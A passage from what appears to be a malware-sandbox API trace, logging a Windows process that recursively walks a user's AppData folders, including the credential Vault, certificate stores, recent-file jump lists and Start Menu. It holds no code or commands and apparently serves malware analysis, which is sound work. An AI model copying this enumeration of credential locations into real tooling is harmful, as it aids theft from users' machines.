onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0057.689] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.689] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.689] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.689] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.689] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.689] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0057.689] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0057.689] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07418 [0057.690] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.690] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.690] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.690] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.690] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.690] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.690] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.690] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.690] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Vault" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault" [0057.690] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*" [0057.691] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.691] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.691] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.691] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.691] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.691] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows" [0057.691] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*" [0057.691] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0057.691] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.691] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.692] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="AccountPictures" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures" [0057.692] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*" [0057.692] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07318 [0057.692] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.692] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.692] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.692] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.692] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.692] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.692] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0057.692] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0057.692] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.693] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.693] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.694] PathMatchSpecW (pszFile="CameraRoll.library-ms", pszSpec="*") returned 1 [0057.694] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.694] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.694] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.694] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0057.694] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.694] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0057.694] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.694] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0057.694] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.694] PathMatchSpecW (pszFile="SavedPictures.library-ms", pszSpec="*") returned 1 [0057.694] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.694] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0057.694] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.694] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.695] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.695] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0057.695] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0057.695] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07418 [0057.696] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.696] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.696] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.696] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.696] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0057.696] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0057.696] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07418 [0057.700] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.700] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.700] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.700] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.700] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0057.700] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0057.700] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.701] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.701] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.701] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0057.701] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0057.701] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0057.701] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.701] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.701] PathMatchSpecW (pszFile="5f7b5f1e01b83767.automaticDestinations-ms", pszSpec="*") returned 1 [0057.701] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.701] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0057.701] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.702] PathMatchSpecW (pszFile="9d1f905ce5044aee.automaticDestinations-ms", pszSpec="*") returned 1 [0057.702] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.702] PathMatchSpecW (pszFile="f01b4d95cf55d32a.automaticDestinations-ms", pszSpec="*") returned 1 [0057.702] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.702] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.702] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.702] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0057.702] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0057.702] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0057.702] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.702] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.702] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0057.702] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.703] PathMatchSpecW (pszFile="f01b4d95cf55d32a.customDestinations-ms", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.703] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.703] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.703] PathMatchSpecW (pszFile="http--www.google.com-.lnk", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.703] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.703] PathMatchSpecW (pszFile="Mozilla Maintenance Service.lnk", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.703] PathMatchSpecW (pszFile="Program Files (x86).lnk", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.703] PathMatchSpecW (pszFile="System and Security.lnk", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.703] PathMatchSpecW (pszFile="System.lnk", pszSpec="*") returned 1 [0057.703] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.704] PathMatchSpecW (pszFile="The Internet.lnk", pszSpec="*") returned 1 [0057.704] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.704] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.704] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.704] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0057.704] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0057.704] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07318 [0057.705] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.705] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.705] PathMatchSpecW (pszFile="Compressed (zipped) Folder.ZFSendToTarget", pszSpec="*") returned 1 [0057.705] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.705] PathMatchSpecW (pszFile="Desktop (create shortcut).DeskLink", pszSpec="*") returned 1 [0057.705] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.705] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.705] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.705] PathMatchSpecW (pszFile="Documents.mydocs", pszSpec="*") returned 1 [0057.705] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.705] PathMatchSpecW (pszFile="Fax Recipient.lnk", pszSpec="*") returned 1 [0057.706] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.706] PathMatchSpecW (pszFile="Mail Recipient.MAPIMail", pszSpec="*") returned 1 [0057.706] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.706] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.707] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.707] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0057.707] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0057.707] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.707] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.707] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.707] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.707] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.707] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0057.707] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0057.708] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07558 [0057.708] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.708] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.708] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessibility" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility" [0057.708] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*" [0057.708] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) 